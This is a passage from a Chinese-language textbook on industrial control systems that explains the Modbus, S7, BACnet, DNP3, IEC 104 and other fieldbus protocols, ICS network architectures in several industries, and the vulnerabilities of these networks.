File)信息号结束本次通信。其中,首标作为命令帧,规定了数据传送方向、数据操作起始地址以及数据传输量等。 在进行数据通信时, 通信应答时间决定了系统读写速度, 而作为主站的计算 机通信时间因上位计算机类型、PC 扫描时间、PLC 数据通信模块应答延迟时间设 定值、波特率、数据传送量的不同而不同。其中, PC 扫描时间与应答延迟时间 对通信时间的影响为,当 PC 扫描时间比应答延迟时间短时,前者对通信时间没 有影响;反之,当 PC 扫描时间比应答延迟时间长时,在计算总通信时间时,采用 PC 扫描时间,计算公式如下: 总通信时间=A+B+C+D 其中, A 为呼叫发送/应答时间, B 为首标发送/应答时间, C 为数据发送/应答时间, D 为通信结束应答时间。 以数据发送时间为例: 数据发送时间=数据传送字符数*通信时间/字符+PC 扫描时间 数据通信中, 数据传送量因采用的传送方式不同而不同。传送方式支持 ASCII 码和二进制两种。其中 ASCII 码是用 8 位表示数字、字母等,因此采用它来进行 数据通信时, 一字节二进制数要由两字节 ASCII 码来表示,实际传输量就是采用 二级制数据通信的两倍。而在某些要求较高的可靠性和实时性的系统中, 为提高 通信速率和更好的实现实时监控, 应选用二进制传输方式, 波特率选用 9600bit/s,并采用奇校验,通信时间/字符为 1ms/字符。 第四章 典型工业控制系统通信协议 通信协议是指双方实体完成通信或服务所必须遵循的规则和约定, 协议定义 了信息单元使用的格式、信息单元应该包含的信息与含义、连接方式、信息发送 和接收的时序, 从而确保网络中数据顺利地传送到确定的地方。工业控制系统通 信协议是指应用于生产、生活的控制系统协议, 其应用领域可以分为程序自动化、 工业控制、智能建筑、输配电通讯协定、智能电表、车用通讯等。常用的工业控制系统通信协议有 Modbus 、S7 、BACnet 、DNP3 、IEC 104 等。 4.1 Modbus 协议 4.1.1 Modbus 协议介绍 Modbus 是一种串行工业协议标准,是 Modicon(现为施耐德电气子公司) 在 1979 年为使用 PLC 而发表的,现已成为工业领域通信协议的业界标准,并且 是工业电子设备之间相当常用的连接方式。Modbus 协议被定义成一个 master/slave(主/从)协议,主设备操作一个或 多个从设备, 从设备不能主动提供信息, 必须等待主设备问询。主设备可以根据从设备的寄存器地址或者索引,对从设备的寄存器中的数据进行读和写。 Modbus 协议使用请求/响应模式, 只适用三种不同协议数据 单元: Modbus 请求、 Modbus 应答、 Modbus 异常应答。每个使用 Modbus 进行 通信的设备都必须指定唯一的地址, 每个命令都制定了目的地址, 虽然其他设备也可能接收到命令消息,但只有地址匹配的设备才会响应。 在 Modbus 发展过程中,产生了几个适应特定需求的衍生协议: Modbus ASCII 和 Modbus RTU Modbus TCP Modbus Plus Modbus ASCII和 Modbus RTU是比较简单的串行协议, 使用 EIA-232或 EIA-485 传输数据包,协议定义了功能码和用于传输数据的编码方案,基础数据包按照 Modbus ASCII,RTU或 TCP 协议进行封装。 Modbus 协议的 TCP 版本遵循 OSI 网络参考模型,定义了 OSI 模型中的表示层和应用层,使用 TCP/IP 协议在网络上传输 Modbus 命令和消息。 Modbus Plus 协议是一种异步半双工通讯的对等网络协议, 物理接口是 RS485, 波特率 1Mbps,采用的是令牌总线访问协议。通讯介质采用屏蔽双绞线或光纤, 不使用其它附加设备最大支持 32 个接点, 双绞线最远传输距离 450m,光纤 3km, 如果采用中继器、桥等设备双绞线最远传输距离 1800m,光纤 12km,最大接点 数 64 个。Modbus Plus 协议提供了 3 种连接:主控计算机(人机接口上位计算机)、现场控制器(PLC 系统)、现场设备(变频器等)。 4.1.2 Modbus/TCP 协议规范 由于可以依赖 TCP/IP 协议的校验, modbus/TCP 协议省去了 CRC 校验, 不过现阶段某些 Modbus 协议又保留了 CRC 校验。 Modbus/TCP 协议的 master/slave(主/从)的区分不太明显,因为以太网允 许点对点通信, 客户端和服务端都是已知的网络实体, 在这种情况下, 从设备变 成服务端,主设备变成客户端,这里允许多个客户端从同一个服务端获取数据,这就意味着可以存在多个主设备和多个从设备, 而不是基于硬件给物理设备定义主从,这里需要系统设计者为主从功能之间创造逻辑关联。Modbus 协议定义了一个与基础通信层无关的简单协议数据单元(PDU),由 功能码向服务器指示将执行哪种操作, 功能码由 1 字节表示, 有效范围为 0~255(128~255 为异常响应保留),一些功能码加入子功能码来定义多项操作。 Modbus 定义了 4 个不同的数据块,如图 4.4 所示,每个数据块都有地址或 者寄存器号码, 因此, 准确的找到一个数据需要功能码(或寄存器类型) 和地址(或寄存器号码)。表 4.1 对寄存器种类进行了说明。 Modbus 协议有三类功能码。 公共功能码 用户定义的功能码 保留功能码 常用的功能码是 01H 、02H 、03H 、04H 、05H 、06H 、0FH 、10H。功能码可 以分为位操作和字操作两类, 位操作的最小单位实比特, 字操作的最小单位是两 个字节。位操作指令: 读线圈状态 01H,读离散输入状态 02H,写单个线圈 05H 和写多个线圈 0FH。字操作指令:读保持寄存器 03H,写单个寄存器 06H,写多 个保持寄存器 10H。 4.2 S7 协议 4.2.1 S7 协议介绍 S7 是西门子公司专有协议, 在西门子 S7-300、400 、1200 、1500 系列的可编 程逻辑控制器(PLC)之间运行。以太网、 PROFIBUS 和 MPI 网络中都可使用 S7协议进行通信。 以太网中 S7 协议利用 TCP 102 端口传输, S7 协议数据包先使用 COTP 协议封装,再采用 TPKT 协议封装进行 TCP 连接 S7 协议通信分为三个阶段, 第一阶段是建立 COTP 连接, 第二阶段是 S7 通信设置,第三阶段是功能码请求与响应。 4.2.2 S7 协议规范 S7 协议数据 Magic 标识固定为 0x32,包含字段 S7 type ,data unit ref,parameters length ,data length ,result info ,paremters ,data Parameters 字段的第一字节为 S7 的功能码。其中 Communication Setup 用于建立 S7 协议连接, Read 用于上位机从 下位机中读取数据, Write 用于上位机向下位机中写入数据, Request Download , Download Block ,Download End ,Download Start ,Upload ,Upload End 用于 download 或者 upload block。PLC Stop 用于关闭 PLC 设备,PLC Control 包含 Hot Run和 Cool Run,用于启动 PLC。 当功能码为 0x00 时, 表示 system functions ,system functions 是对用于系统 设置与状态查看一类功能码的统称,在 parameters 字段中通过 4bits 的 function group 和 1byte 的 subfunciton 来区分 Systems Functions 分为 7 类 group,如表 4.4 所示。其中 block function 用于读取 block 信息, time function 用于查看和设置系统时间。 4.3 BACnet 协议 4.3.1 BACnet 协议介绍 BACnet(Building Automation and Control Network)是一种为楼宇自动控制网 络所指定的数据通信协议, 由美国采暖、制冷与空调工程师协会资助的标准项目 委员会于 1995 年 6 月制定, 1995 年 12 月称为美国标准, 2003 年 1 月正式成为 国际标准,也是智能建筑楼宇自动控制领域中唯一的国际标准。 BACnet 标准产生的背景是用户对楼宇自动控制设备互操作性的广泛要求, 即将不同厂家的设备组成一个一致的自控系统。 BACnet 标准对 ISO/OSI-RM 进行了精简和压缩,其目的是为了解决楼宇自控 网络信息通信和互操作性的基本问题, 在体系结构上可以划分为通信功能和互操作性两大部分,并且这两大功能部分即相互独立,又相互联系。 4.3.2 BACnet 协议规范 BACnet 协议通信功能由物理层、数据链路层和网络层三个协议层进行定义,互操作功能由应用层单独定义。其传输层采用 UDP 协议,设备 默认开放 47808 端口监听。 BACnet 协议的数据流称为协议数据单元(PDU),由应用层产生的数据流称为应用层协议数据单元(APDU)。 BACnet 应用层协议数据单元(APDU)的第 1 字节的第 2-4 比特表示 APDU类型。 APDU 共有 8 种类型。 4.4 DNP3 协议 4.4.1 DNP3 协议介绍 DNP(Distributed Network Protocol,分布式网络规约) 是一种应用于自动化 组件之间的通讯协议,常见于电力、水处理等行业, SCADA 可以使用 DNP 协议 与主站、 RTU、及 IED 进行通讯。 DNP 协议标准由 IEEE 提出,参考了 IEC 870-5、 以及其他一些 IEC 协议, 主要为了解决 SCADA 行业中, 协议混杂、没有公认标准 的问题。DNP 协议有一定的可靠性, 这种可靠性可以用来对抗恶劣环境中产生的 电磁干扰、元件老化等信号失真现象, 但不保证在黑客的攻击下、或者恶意破坏控制系统的情况下的可靠性。 DNP3.0 规约采用 EPA 模型,分为三层结构:数据链路层,伪传输层和应用 层。数据链路层负责通信链路的建立、数据的接收、发送和初步处理; 伪传输层负责应用数据的分包和组包;应用层实现真正的信息处理。 4.4.2 DNP3 协议规范 DNP3 可通过 TCP/UDP 进行封装,以便在以太网上运行,支持 DNP3 协议的从设备默认会开放 TCP 的 20000 端口用于通信。DNP3.0 规约多采用问询—应答方式,但也允许从站主动上送信息。一个典型的 DNP 应答处理过程一般如下所示。 主站: 应用层组织好信息后交给伪传输层; 传输层把应用层报文分帧, 每帧前加上一个 TH 报头,然后交给链路层; 链路层则把每帧报文分块, 每块最多 16 字节, 每个块后加一个 16 位的 CRC 校验码,同时链路层有一个固定长度的报头,包含有地址、长度等信息; 主站链路层发送报文, 并且在规定时间内, 在未收到对方确认时进行重发(如果要求)。 从站: 链路层接收完一帧报文后,进行 CRC、地址、长度等合法性检查,如对 方链路层要求确认, 则回答 ACK 或 NACK 报文, 然后把接收正确的报文 去掉报头和每块的 CRC 后交给传输层; 传输层检查 TH 报头,并在多帧报文时按顺序把报文组成一个完整的应 用层数据包,然后交给应用层; 应用层收到报文后, 如对方应用层要求确认, 先回答一个 Confirm 报文, 然后对信息进行处理,再组织回答报文(回答过程类似主站)。 DNP3.0 的数据链路层采用一种可变帧长格式: FT3。 一个 FT3 帧被定义为一个固定长度的报头,随后是可选的 数据块,每个数据块附有一个 16 位的 CRC 校验码。固定的报头含有 2 个字节的 起始字, 一个字节的长度(LENGTH),一个字节的链路层控制字(CONTROL),一个 16 位的目的地址, 一个 16 位的源地址和一个 16 位的 CRC 校验码。 DNP 的传输层是一个伪传输层。伪传输层功能专门设计用于传送超出链路规约数据单元(LPDU)定义长度的信息。 传输层报头 TH:传输控制字, 1 个字节。数据块: 应用层用户数据 1-249 个 字节。由于数据链路层的 FT3 帧格式中长度字的最大限制为 255,因此传输层数 据块的最大长度为: 255-5(链路层控制字+源地址+目的地址) -1(TH)=249 。 当应用层用户数据长度大于 249 字节时, 传输层将以多帧报文方式传送, 并每帧前加 TH 控制字。如 1234=249+249+249+249+238,分 5 帧传送。 DNP 的应用层负责真正的信息处理。其报文分为请求报文和响应报文两类。在 DNP 中,只有指定的主站能够发送应用层的请求报文,而从站则只能发送应用层的响应报文。 请求(响应) 报头: 标识报文的目的, 包含应用规约控制信息(ACPI); 对象标题:标识随后的数据对象; 数据:在对象标题内指定的数据对象。 4.5 IEC60870-5-104 协议 4.5.1 IEC60870-5-104 协议介绍 IEC60870-5-104 网络传输规约是国际标准规约, 主要应用于电力系统变电站 计算机监控系统或 RTU 与主站 SCADA 系统之间的数据通信。主站与从站之间的 网络通信底层采用 TCP/IP 协议, 应用层协议采用 IEC60870-5-104 传输规约。其协议基本参数如下: 最大帧长 255 字节 帧时间间隔 50ms TCP 网络端口号 2404 采用平衡传输,每个节点(包括主站、从站)均可启动报文发送 4.5.2 IEC60870-5-104 协议规范 IEC60870-5-104 协议应用层产生的数据流称为应用层协议数据单元(APDU)。 一个 APDU 由应用协议控制信息: APCI(Application protocol control information)和应用服务数据单元: ASDU(Application service data unit)两部分组成。每个 APCI 包含下列的定界元素: 一个启动字符, ASDU 的长度, 以及控制域。可以传输一个完整的 APDU(或者处于控制目的, APDU 中仅包含 APCI 域)。起始字节 0x68 定义了一帧数据的起始。APDU 长度定了 APDU 体的整个长度, 包括了 APCI 的四个控制域和 ASDU 的长度。 ASDU 的最大长度限制在 249(减去 4 字节的控制域)以内,因为 APDU 域的最大长度是 253(255 减去起始和长度 字节)。控制域定义了保护报文不致丢失和重复传送的控制信息、报文传输启动、停止、以及传输连接的监控等控制信息。 APCI 分为 I 类帧、S 类帧和 U 类帧: I 类帧的控制域包含发送序号和接收序列号,两个序列号在每个 APDU 和每 个方向上都应按顺序加一,两个序列号都在 0~32767 之间的循环。发送方增加发 送序列号,接收方增加接收序号,接收方可连续确认多个 APDU。如果只在一个 方向上进行较长的数据传输, 则另一方使用 S 帧确认这些 APDU。I 类帧一般用于双方都需确认的情况,在一个 TCP 连接创建后,发送和接收序号均被置 0。 S 类帧具有计数的监视功能, 其为短帧, 长度固定为 6 个字节。接收方收到 I类帧发送的数据, 但自身没有数据要发送的情况下, S 帧用于确认收到对方的帧。U 类帧具有不计数的控制功能,长度固定为 6 字节,用于控制报文。IEC60870-5-3 描述了远程系统传输帧中的基本应用数据单元, 并定义了配套系统中的应用服务数据单元(ASDU)。 ASDU 由数据单元标识符和一个或多个信息对象组成。数据单元标识符在所 有 ASDU 中具有相同的结构,而一个 ASDU 中的信息对象也常有相同的结构、类型和格式, 它们的结构、类型和格式由类型标识域所定义。应用服务数据单位元公共体地址的八位位组是由系统参数所决定, 公共体地址是站地址, 可以去寻址 整个站或者仅仅是站的特定部分。 时标(如果出现的话) 它属于单个信息对象。信息对象由一个信息对象标识 符(如果出现的话),一组信息元素和一个信息对象时标(如果出现的话) 组成。 信息对象标识符仅由信息对象地址组成, 大多数情况下, 在一个特定系统中, 应用服务数据单元公共体地址连同信息对象地址一起可以区分全部信息元素集, 在每一个系统中这两个地址结合在一起将是明确的, 类型标识不是公共体地址也 不是信息对象地址。 一组信息元素集可以是单个信息元素, 一组综合元素或者一个顺序元素。 4.6 其他工业控制系统通信协议 还有许多其他工业协议, 本文难以一一描述,仅选择下面三种作简单介绍。 4.6.1 Ethernet/Industrial Protocol 协议 Ethernet/Industrial Protocol(EtherNet/IP)是由洛克威尔自动化公司开发的 工业以太网通讯协定, 由开放 DeviceNet 厂商协会(ODVA)管理, 是一个高级的 工业应用层协议,可应用在程序控制及其他自动化的应用中,是通用工业协定(CIP)中的一部分。 EIP 采用和 DevieNet 以及 ControlNet 相同的应用层协 CIP(Control and Information Protoco1),可以理解为通过以太网传输的 CIP 协议即为 EIP 。EIP 和 CIP 技术的主要管理者为 ODVA(OpenDeviceNet Vendor Association)组织, ODVA 组织成立于 1995年,由超过300个来自世界的领先工业自动化产品供应商组成。 在上世纪 90 年代工作于ControlNetInternationalLtd.(CI)的技术团队开发了 EIP , 在 2000 年 ODVA 和 CI 联合形成一个组织 JTA(JointTechnology Aggreement)进 行 EIP 协议开发,在 2009 年, JTA 组织终结,最终 EIP 成为 ODVA 组织的一个成员,直至今日 EIP 技术主要的控制方也是 ODVA。其主要技术细节如下。 传输基本的 I/O 信息通过 UDP 协议,叫做隐性信息。 上传和下载参数,设置信息等通过 TCP 协议传输,叫做显性信息。 轮询,循环数据和设备状态改变检测通过 UDP。 一对一(单播),一对多(多播),一对所有(广播)通信通过 IP 方式。 通常显性信息(TCP)使用 44818 端口,隐性信息(UDP)使用 2222 端 口。 4.6.2 Profibus 协议 Profibus 协议是一种 20 世纪 80 年代末由德国电器工业中心协会开发的现场 总线协议。它包括几种变体,如 Profibus-DP(分散性外围),与 Profibus-PA(过 程自动化)。其中标准化变体 Profibus-DP 本身又有V0、V1 和V2 三种常见的变体。 而 Profibus 通信也有异步、同步和以太网三种类型, 以太网上的 Profibus 也成为Profinet。 4.6.3 EtherCAT 协议 EtherCAT 是一个实时以太网现场总线协议,它使用以太类型 0x88A4 在标准 以太网络上传输控制系统信息。由于以太网帧载荷较大(46-1500 Bytes),而分 布式过程数据较小, 一版每周期仅有几字节数据, 为了最大限度地提高通信效率, EtherCAT 将多个分布式过程数据封装到单个以太网帧中传输, 这样一个完整周期 只需要一个或两个以太网帧。从节点一次加入响应消息后将帧传给其他从节点,知道最后一个从节点返回完整的回应帧。 4.6.4 SERCOS III 协议 串行实时通信系统(Serial Real-time Communications System,SER-COS)是一 种专门为数字运动控制设计得现场总线。 SERCOS III 是一种用于在 PLC 与 IED 之间进行高速闭环串行通信的实时以太网通信协议。 第二部分:揭开工业控制网络安全的面纱 第五章 工业控制络基础 前边主要介绍了工业控制系统的相关概念和知识, 本章则重点介绍工业控制 网络的基本知识。 5.1 工业控制网络概述 工业控制网络是工业控制系统(ICS)的网络部分,涵盖多种类型的控制系 统中的组件,包括监控和数据采集(SCADA)系统,分布式控制系统(DCS)等 控制系统, 而大多数实际应用的工业控制系统往往是两者混合的控制系统。对于 工业控制网络逻辑结构和关键组件的理解, 是工业控制网络安全研究的一个基础前提。 在工业控制网络结构方面, 美国 NIST SP 800-82 分别给出了 SCADA 系统、DCS 系统以及混合控制系统的实际应用场景和典型拓扑结构; ANSI/ISA-99 发布的标 准则明确了工业控制网络的结构模型, 将工业控制系统分为 5 层, 分别为: 企业 网络层、监控执行层、数据采集层、监控层以及物理过程层, 明确将工业控制系 统划分为控制组件和网络组件, 并分别详细介绍了每个组建的功能。Michael Berg 等人则根据发电厂的应用场景, 分析了控制自动化系统(Controland Automation Systems)中的网络结构,将工业控制网络结构模型分为:基础设施设备层 (Infrastructure Equipment)、SCADA 现场设备层(SCADA Field Equipment)、控制 中心层(Control Center)和自动监管层(Automation Oversight),并将数据和设 备作为控制自动化系统的组件分别进行介绍, 并运用对象角色建模(ORM)的方法,阐述了组件之间的关系。 5.1.1 工业控制网络体系结构 工业控制网络的体系结构随着对应工业控制系统的具体工艺流程、生产环境、 控制技术等因素的不同, 会产生较大的差异。但是, 忽略不同系统间的个性差异差异(如 SCADA 与 DCS 系统间的差异)。 工业控制系统网络一般分为企业网络层、监控执行层、数据采集层、监视控制层以及物理过程层等 5 个层次,具体如下。 企业网络层:办公网络,主要进行商业计划、人力资源、物流管理等。 监控执行层: 生产执行网络, 主要进行管理中心级别的生产工艺整体监 控,以及生产计划制定等。 数据采集层: 数据采集网络, 主要对控制设备进行单点或者多点的过程 数据采集或转换。 监视控制层: 控制网络, 主要进行站级的生产工艺局部监控, 以及逻辑 修改、下发等。 物理过程层:现场过程网络,主要执行各种物理过程。 其中, 企业网络层为信息网络, 监控执行层、数据采集层、操作控制层和物理过程层为控制网络。 5.1.2 工业控制网络关键组件 不同工业控制网络中所包含的组件类型根据工艺过程和生产环境, 会有一定 差异,但是总体上可以分为 PC 类型智能组件、嵌入式类型智能组件以及非智能组件。 工业控制系统中除物理过程层外所包含组件基本都为 PC 类 型智能组件, 物理过程层包含嵌入式类型智能组件(如 PLC、RTU、智能仪表等),以及非智能组件(如电动调节阀、液位变送器等) 。具体如下。 企业网络层:传统办公 PC,服务器等。 监控执行层: APC 服务器、历史数据库、 Batch 服务器、中心监控服务 器。 数据采集层: Buffer 机(OPC Client)、实时数据库、DDE、ODBC 数据库。 监视控制层: OPC Server、操作员站、工程师占、监控服务器、现场控 制站、 PLC 、RTU 以及各种控制器。 物理过程层: I/O 模块、智能仪表和非智能仪表等。 5.1.3 工业控制网络与 IT 网络的集成 工业控制网络一般包含处理工业控制系统管理与决策信息的信息网络和处 理控制现场实时测控信息的控制网络两部分。信息网络位于企业中上层, 处理大量、变化、多样的信息, 具有高速、综合的特征; 控制网络位于企业中下层, 处理实时、现场的信息, 具有实时性强, 安全性强(这里专指物理安全, 即 Safety)。信息网络和控制网络的集成,可以通过以下几种方式实现。 采用硬件实现 硬件设备可以是一台专门的计算机, 依靠其中运行的软件完成数据包的识别、 解释和转换; 可以是一块智能接口卡, 完成现场总线设备与以太网中监控计算机之间的数据通信。这种集成方式功能较强,但实时性较差。 采用 DDE 技术实现 当控制网络和信息网络之间有一个共享工作站或通信处理机时, 可采用动态 数据交换技术(Dynamic Data Exchange ,DDE)方式实现两者的集成。这种方式 具有较强的实时性,而且比较容易实现,可以采用 Windows 技术,但是协议转换较复杂,软件开销比较大,只适合配置简单的小型系统。 采用统一的协议标准实现 这是解决网络集成最好的办法, 不过这需要设计控制网络的协议以提高其传 输速度, 从而更好的与信息网络相融合。如目前比较流行的工业以太网, 它是在 以太网技术和 TCP/IP 技术的基础上开发出来的一种控制网络(包含 Profinet、HES、Ethernet/IP 、ModbusTCP 等)。 采用数据库访问技术实现 当控制网络采用工业以太网时,可以通过在控制网络部署数据库,通过TCP/IP 将数据库内容发布到控制网络的方式实现控制网络和信息网络的集成。 采用 OPC 技术实现 OPC(OLE for Process Control)技术基于 Windows 的 DCOM 技术, 由大部分 的自动化公司合作开发的一套数据交换工业标准。OPC 技术的主要特点是“即插 即用”,它采用标准方式配置硬件和软件接口, 一个设备可以很容易地加入现有系统并立即使用。 5.2 典型工业领域的工业控制网络 本节将重点介绍一些典型工业领域的工控网络。 5.2.1 钢铁行业的工业控制网络 钢铁行业的工业控制以太网一般采用环网结构, 为实时控制网、动作控制器、 操作员站、工程师站之间的过程控制数据提供实时传输。网络上所有操作员站、 数据采集站以及 PLC 都使用以太网接口并设置为同一网段的 IP 地址,网络中远 距离传输介质为光缆,本地传输介质为普通网线(如 PLC 与操作员站之间)。生产监控主机利用双网卡结构与管理网相连。 网络垂直划分为互联网层、办公网层、监控层、控制层及现场层(仪表)。 网络水平则划分为不同功能区域(烧结、炼铁、炼钢、轧钢等)。 5.2.2 石化行业的工业控制网络 典型情形下, 现有的炼化厂生产控制系统的网络拓扑如图 5.4 所示。大型石 油化工生产控制系统庞大, 安全要求高, 现场由多个控制系统完成控制功能。大 型石油化工工程全厂 DCS 采用大型局域网架构, 网络架构较为复杂。现场的主要 控制功能都是由 DCS 来完成的, 其他系统集中控制在某种程度上可以完全由 DCS 监控。 DCS 含有大量的数据接口, 是构建企业信息化的数据来源和执行机构。除DCS 外的其他系统一般对外并没有数据接口(无生产数据),且相对独立,网络结构简单。主要控制系统的功能如下所示。 分布式控制系统(DCS) DCS 完成生产装置的基本过程控制、操作、监视、管理、顺序控制、工艺联 锁,部分先进控制也在 DCS 中完成。大型石油化工工程全厂 DCS 采用大型局域 网架构。根据生产需求, 系统规模和总图布置划分为若干独立的局域网, 确保每套生产装置独立开停车和正常运行。 安全仪表系统(SIS) SIS 设置在现场机柜室,与 DCS 独立设置,以确保人员及生产装置、重要机组和关键设备的安全。 SIS 按照故障安全型设计,与 DCS 实时数据通信,在 DCS操作员站上显示。大型石油化工工程全厂 SIS 采用局域网架构。根据生产需求、 系统规模和总图布置划分为若干独立的局域网, 确保采用 SIS 的生产装置独立开停车和安全运行。 可燃/有毒气体检测系统(GDS) 生产装置、公用工程及辅助设施内可能泄漏或聚集可燃、有毒气体的地方分别设有可燃、有毒气体检测器,并将信号接至 GDS。 压缩机控制系统(CCS) 压缩机控制系统完成压缩机组的调速控制、防喘振控制、负荷控制及安全联 锁保护等功能,并与装置的 DCS 进行通信,操作人员能够在 DCS 操作员站上对机组进行监视和操作。 转动设备监视系统(MMS) MMS 主要用于透平机、压缩机和泵等转动泵等转动设备参数的在线监视, 同时对转动设备的性能进行分析和诊断, 对转动设备的故障预测维护进行有力的支持。 可编程逻辑控制器(PLC) 操作控制相对比较独立或特殊的设备的控制监视和安全保护功能原则上采 用独立的 PLC 控制系统。与 DCS 进行数据通信,操作人员能够在 DCS 操作员站上对设备的独立运行进行监视和操作。 在线分析仪系统(PAS) 在线分析仪(工业色谱仪、红外线分析仪等) 应包括采样单元、采用预处理 单元、分析器单元、回收或放空单元、微处理器单元、通信接口(网络与串行)、显示器(LCD)单元和打印机等。 5.2.3 电力行业的工业控制网络 大型电厂全厂 DCS 采用大型局域网架构,网络架构较为复杂。以下是 DCS网络的架构说明。 L1 基础控制层 该层网络完成控制生产过程的功能, 主要由工业控制器、数据采集卡件, 以及各种过程输入输出仪表组成, 也包括现场所有的系统间通信。可以本地实现连续控制调节和顺序控制、设备检测和系统测试与自诊断、过程数据采集、信号转换、协议转换等功能。 L2 监控层 该层包含各个分装置的工程师站以及操作员站, 可以对生产过程进行生产过 程的监控、系统组态的维护、现场智能仪表的管理。事实上, 由 L1 和 L2 层就能 进行产品的正常生产, 但是在大型电厂中, 为了实现生产管理智能化以及信息化,通常都会设置 L3 及以上的网络层。 L3 操作管理层(集控 CCR) DCS 管理层网络通过 L3 级交换机汇聚各分区 L2 层的 LAN。设置全局工程师 站可以对分区内所有装置的组态进行维护, 查看网络内各装置的监控画面、趋势和报警。 L3 层设置的中心 OPC 服务器,可以实现对各装置实时数据的采集。 L4 调度管理层(厂级 SIS) SIS 是实行生产过程综合优化服务的实时管理和监控系统,它将全厂 DCS、PLC 其他计算机过程控制系统汇集在一起,并与管理信息系统(Management Information System ,MIS)有机结合,在整个电厂内实现资源共用、信息共享,做到管控一体化。 5.2.4 市政交通行业的工业控制网络 地铁综合监控系统的总体架构如图 5.6 所示。它由中央综合监控系统、车站 综合监控系统(包括车辆段综合监控系统) 以及将它们连接的综合监控系统骨干网组成。 中央综合监控系统 中央综合监控系统安装在线路监控中心, 用于监视全线各个车站(包括车辆 段) 的各个子系统的运行状态, 完成中心级的操作控制功能。中央综合监控系统 由中央监控网、OCC(Operating Control Center,运行控制中心) 实时服务器、历 史和事件服务器、磁盘阵列、磁带记录装置、各类操作员工作站、中心互联系统、 UPS 打印机、机柜和附件等部分组成。此外,还有全系统的网络管理系统(NMS)、大屏幕系统(OPS)。 车站综合监控系统 车站级监控网为双冗余高速交换式以太网,数据传输率为 100Mbit/s 或1000Mbit/s,遵循 IEEE802.3 标准、使用 TCP/IP 协议,网络交换机为冗余配置。 综合监控系统骨干网 综合监控系统骨干网(MBN)可采用地铁工程通信骨干网的传输信道, 也可单独组建骨干网。地铁综合监控系统是一个地理分散的大型 SCADA 系统。它构建在分布于方圆几十千米的广域网上。 第六章 工业控制网络威胁分析 “维护网络安全, 首先要知道风险在哪里, 是什么样的风险, 什么时候发生 风险”,为了保护网络免受攻击,了解攻击者如何接近工业网络、获准访问并最 终取得控制权是很重要的。在经典的 Internet 网络环境(TCP/IP)中,黑客的手 法和技术通常可以概括为“识别、探测及渗透”,然而,在工业控制网络中,黑 客的手法虽然相同, 但技术方面有着细微差别。在对系统进行有效保护之前, 应 对工业控制网络的脆弱性, 安全问题的根源, 以及系统、设备和协议的漏洞进行深入了解。 6.1 工业控制网络的脆弱性 现在使用的工业控制网络大多数都很陈旧, 很多是在公共和私有网络、桌面 计算和互联网普及之前, 基于性能、可靠性、功能安全和灵活性的需求进行开发 的。在很多场合, 这些工业控制网络通过物理隔离与其他网络分开, 并使用专用 软件、硬件和缺乏网络安全功能的通信协议。而随着技术的革新, 硬件、软件和 网络技术的发展成果也被大量用在了工业控制网络中, 使得工业控制网络与外界 的隔离程度变得越来越低, 其中一个负面影响就是迫切需要对其进行网络安全防 护。工业控制网络的安全, 一方面面临着通用 IT 技术方面的问题,另一方面也 面临自己独有的难题。工业控制网络与传统计算机网络有很多性质上的不同, 包括不同的风险和特 性;工业控制网络对性能和安全有着不同的要求,并使用典型 IT 人员不熟悉的 操作系统和应用软件; 在控制系统的设计和操作中, 成产功能安全和网络安全防 护往往是相互矛盾的; ICS 与 IT 系统之间的操作和风险差异加大了部署网络安全和操作策略的复杂 度,针对 ICS 的特殊性, ICS 网络安全防御面临以下问题: ICS 一般都是实时性要求很高,它不允许延迟,因此部署工业控制网络安全 防御必须考虑对系统实时性的影响。 ICS 过程很多在本质上是连续的, 它不允许中断, 如果中断要提前进行安排, 因此工业控制网络安全防御不应对 ICS 的生产连续性有影响。 ICS 首先考虑的是人员、设备、产品等的安全问题,因此工业控制网络安全 防御要协调好功能安全与网络安全之间的矛盾关系。 ICS 的集中控制器和分布控制器如 PLC 等在网络安全中都很重要,因此工业 控制网络安全防御步进要放在集中控制器上,还应考虑分布控制器。 ICS 系统与物理过程有很复杂的联系,因此在部署工业控制网络安全防御时 必须测试其与现在的 ICS 的兼容性。 ICS 中,系统自动响应和对人际互动的时间有严格的要求,例如 HMI 上的口令验证不应阻碍控制系统的紧急执行命令。 ICS 的操作系统和应用软件不能兼容 IT 方面的成果, ICS 网络更复杂, 应用软 件和硬件很难升级,这对部署工业控制网络安全防御有更高的要求。 ICS 环境下的控制系统用于现场设备的通信协议与 IT 环境下是不同的,部署 ICS 安全防御要考虑到实际的通信协议。 ICS 预计的常使用寿命另外增加了两个类型的挑战:如何确保目前传统系统 的运作以及现在如何设计系统,可以很容易适应未来的安全威胁和技术。 自动化设备缺乏基本的安全功能, 例如, 定义用户账号或支持安全通信协议 的能力。 大多数目前使用的工业控制通信协议都没有或只有简单的安全功能, 此安全 功能主要是涉及到数据的访问控制项, 这主要是为了防止意外操作失误, 但不能 抵御专门的攻击。 一些在 ISO/OSI 模型不同层次的传统加密算法和协议可用于帮 助解决一些安全问题, 但是加密不能解决所有安全问题。总之, 工业控制网络大 量采用了 IT 上开放的网络协议,增加了工业控制网络的互联性, IT 很多的技术 可以用到工业控制网络上, 但他们之间的差异性也对工业控制网络安全防御提出 了更多的挑战。 工业控制网络由工艺设备、过程控制硬件、网络设备和工业计算机等组成, 是一个非常复杂的系统, 远远超越了计算机系统的范畴, 但是目前业界并没有专 门为工业控制网络定义属于该领域的脆弱性概念, 而是大部分沿袭了信息领域的 定义。下面从系统策略、平台和网络上对工业控制网络脆弱性的概念进行总结定义。 第一,在工业控制网络安全中, 存在于控制系统安全政策、实现指南、安全 培训、安全架构、配置管理等事件中的, 能够被威胁主体渗透以获取对工业控制信息的未授权访问或者扰乱关键步骤的弱点。 第二, 在工业控制网络安全中, 存在于控制系统硬件、操作系统、应用程序 等平台中的, 能够被渗透从而对工业控制系统或组件造成损害的缺陷、误配置以及不良维护等弱点。 第三,在工业控制网络安全中, 存在工业控制网络以及与其它网络连接中的,能够被渗透从而对工业控制网络组件或行为造成损害的缺陷、误配置以及不良维护等弱点。 简单而言, 工业控制网络的脆弱性就是工业控制网络在硬件、软件、协议的 具体实现或系统策略上存在的与网络安全相关的缺陷或不足, 对该缺陷的渗透可 获得工业控制网络的额外控制权限, 从而获得更多的工业控制网络资源, 或产生对工业控制网络更大地破坏。 6.2 工业控制网络信息安全问题根源 工业控制网络安全问题的根源就是缺乏本质安全。工业控制网络在设计之初, 由于资源受限、物理隔离等原因, 为保证实时性和可用性, 系统各层普遍缺乏安 全性设计。尽管目前已有工控产品提供商开始对旧系统进行加固升级, 研发新一 代的安全工控产品, 但是由于市场、技术、使用环境等方面的制约, 工控产品生产商普遍缺乏主动进行安全加固的动力。 信息系统中的主要组成单元是计算机, 